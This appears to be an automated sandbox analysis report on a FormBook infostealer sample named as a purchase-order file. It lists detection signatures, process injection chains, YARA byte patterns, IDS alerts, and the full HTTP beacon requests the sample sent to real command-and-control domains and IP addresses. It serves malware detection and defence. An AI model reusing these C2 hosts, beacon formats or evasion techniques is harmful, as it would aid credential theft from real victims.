Windows Analysis Report
PO_987654345678.exe

Overview

General Information

Sample name: PO_987654345678.exe
Analysis ID: 1503298
MD5: 4214be98801c44f69b60490a3321e940
SHA1: df33635a4f458821d10ce62860a043a960ced09f
SHA256: 416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO_987654345678.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\PO_987654345678.exe" MD5: 4214BE98801C44F69B60490A3321E940)
    • svchost.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\PO_987654345678.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ftfqgrfncDSuar.exe (PID: 2676 cmdline: "C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 7716 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • ftfqgrfncDSuar.exe (PID: 4908 cmdline: "C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 memory-dump entries in total; the remaining entries are not reproduced here)

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e8e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f6e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ParentImage: C:\Users\user\Desktop\PO_987654345678.exe, ParentProcessId: 7592, ParentProcessName: PO_987654345678.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ProcessId: 7608, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ParentImage: C:\Users\user\Desktop\PO_987654345678.exe, ParentProcessId: 7592, ParentProcessName: PO_987654345678.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ProcessId: 7608, ProcessName: svchost.exe
Suricata IDS alerts

Timestamp | SID | Severity | Source Port | Destination Port | Protocol | Classtype
2024-09-03T10:44:01.742289+0200 | 2855464 | 1 | 64979 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:01.742289+0200 | 2856318 | 1 | 64979 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:04.484356+0200 | 2855464 | 1 | 64995 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:07.030105+0200 | 2855464 | 1 | 64996 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:39.695804+0200 | 2855464 | 1 | 65001 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:04.760330+0200 | 2855464 | 1 | 65008 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:34.598530+0200 | 2855464 | 1 | 64999 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:51.843934+0200 | 2855464 | 1 | 65019 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:37.934520+0200 | 2855464 | 1 | 65015 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:33.730485+0200 | 2855464 | 1 | 64989 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:47.751813+0200 | 2855464 | 1 | 65003 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:41.933384+0200 | 2855464 | 1 | 64991 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:28.528096+0200 | 2855464 | 1 | 64987 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:54.223315+0200 | 2855464 | 1 | 65020 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:43:49.860515+0200 | 2855464 | 1 | 64976 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:18.924552+0200 | 2855464 | 1 | 65012 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:02.214733+0200 | 2855464 | 1 | 65007 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:09.574571+0200 | 2855464 | 1 | 64997 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:16.082124+0200 | 2855464 | 1 | 65011 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:43:52.570998+0200 | 2855464 | 1 | 64977 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:31.069926+0200 | 2855464 | 1 | 64988 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:44.455444+0200 | 2855464 | 1 | 64992 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:07.048957+0200 | 2855464 | 1 | 64981 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:43.036728+0200 | 2855464 | 1 | 65017 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:51.371433+0200 | 2855464 | 1 | 65004 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:40.500505+0200 | 2855464 | 1 | 65016 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:07.584283+0200 | 2855464 | 1 | 65009 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:52.847260+0200 | 2855464 | 1 | 65005 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:56.818565+0200 | 2855464 | 1 | 65021 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:47.032770+0200 | 2855464 | 1 | 64993 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:43:47.542947+0200 | 2855464 | 1 | 64975 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:46:21.417014+0200 | 2855464 | 1 | 65013 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:44:04.255956+0200 | 2855464 | 1 | 64980 | 80 | TCP | A Network Trojan was detected
2024-09-03T10:45:37.169364+0200 | 2855464 | 1 | 65000 | 80 | TCP | A Network Trojan was detected

            AV Detection

Source: PO_987654345678.exe | Virustotal: Detection: 37%
Source: PO_987654345678.exe | ReversingLabs: Detection: 42%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO_987654345678.exe | Joe Sandbox ML: detected
Source: PO_987654345678.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftfqgrfncDSuar.exe, 00000002.00000002.4118133929.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp, ftfqgrfncDSuar.exe, 00000007.00000000.1919962522.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F6DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00F6DBBE
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F768EE FindFirstFileW,FindClose | 0_2_00F768EE
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00F7698F
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F6D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00F6D076
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F6D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00F6D3A9
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F79642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F79642
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F7979D
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F79B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00F79B2B
Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F75C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00F75C97
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0099C750 FindFirstFileW,FindNextFileW,FindClose | 3_2_0099C750
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0099C886 FindFirstFileW,FindNextFileW,FindClose | 3_2_0099C886
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 4x nop then xor eax, eax | 3_2_00989B00
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_049E04DE

            Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64979 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:64979 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64980 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64976 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64975 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64997 -> 5.144.130.52:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64993 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64991 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64992 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65007 -> 218.247.68.184:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65016 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65019 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65003 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65020 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65001 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65008 -> 218.247.68.184:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65012 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64996 -> 5.144.130.52:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65009 -> 218.247.68.184:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64995 -> 5.144.130.52:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65004 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64977 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65011 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65015 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65005 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64987 -> 162.0.239.141:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65017 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64988 -> 162.0.239.141:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64981 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64989 -> 162.0.239.141:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65000 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65013 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64999 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65021 -> 188.114.97.3:80
            Source: DNS query: www.asian-massage-us.xyz
            Source: DNS query: www.golbasi-nakliyat.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | ASN Name: HOSTIRAN-NETWORKIR HOSTIRAN-NETWORKIR
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, | 0_2_00F7CE44
            Source: global traffic | HTTP traffic detected: GET /xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.clientebradesco.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.myim.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.d55dg.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.fineg.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.asian-massage-us.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.aflaksokna.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
